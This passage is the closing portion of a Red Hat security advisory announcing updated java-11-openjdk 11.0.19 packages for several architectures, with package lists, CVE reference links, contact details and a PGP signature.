java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsMNzjgjWX9erEAQhqvw//WhLH9EibD9Wg9khIm+puypctGFF/sImh  
pUeoQmiaLk6YDvesqljArPjZnwA/4+jeTym8jczhJV9rBV9f4/LN4l/uGBNkiWtK  
pebt8SKFVrkIYyH6zos1vyMRNe937u9SgkvCyKbSFhPmCziDy2XaA2XL6ub+YWFn  
/1CNvy9wERStSpYQMonsH0fU+Fd/bmF/R2y6X7MfUEsCllKyjlxZ1lFkEpPoGHrh  
p4hIOA8hPxPoAJ4ThVTqCSVSv01B/YBiCmR10WnoWir7wj+pU3hEbuAPQs08CnqB  
tkLk1aaE68wAh2CMcblJK66w55SpHR6cot0qNa8F7z8MX3YuVwiIBDSGlCJ6Smnu  
ON8HNdn29JZ9Kj5apdi0edaX/ZZ0lP2KdeC22DIYtNz4h7G028MwB0YR9/Sh7wlx  
f3pYVeQZlKTOsl9pTFjgRaOesHhznS1S2Fe2ClOjCP6nltvq+paRCOy8jL2ZHc9b  
/2XCt7BHbWT4vUPO0gUpuJaVOrVBFuJxBOo1kpu1g/xsw7SlcuG+nCGAyLZ0WnlK  
SftlYMUiSNViMEBg4gGBj+nPrmISyfdyCUfEkPpxqcHFhiv3u309cBKZ0fWhXl1Q  
SAlH+hZuxFAnlgw1RuNCTxW9WEIydCtj/tASL6izRPJK/BX0VRZoAQUshCB0QlWy  
C1cyOJPSxKs=  
=4BgK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux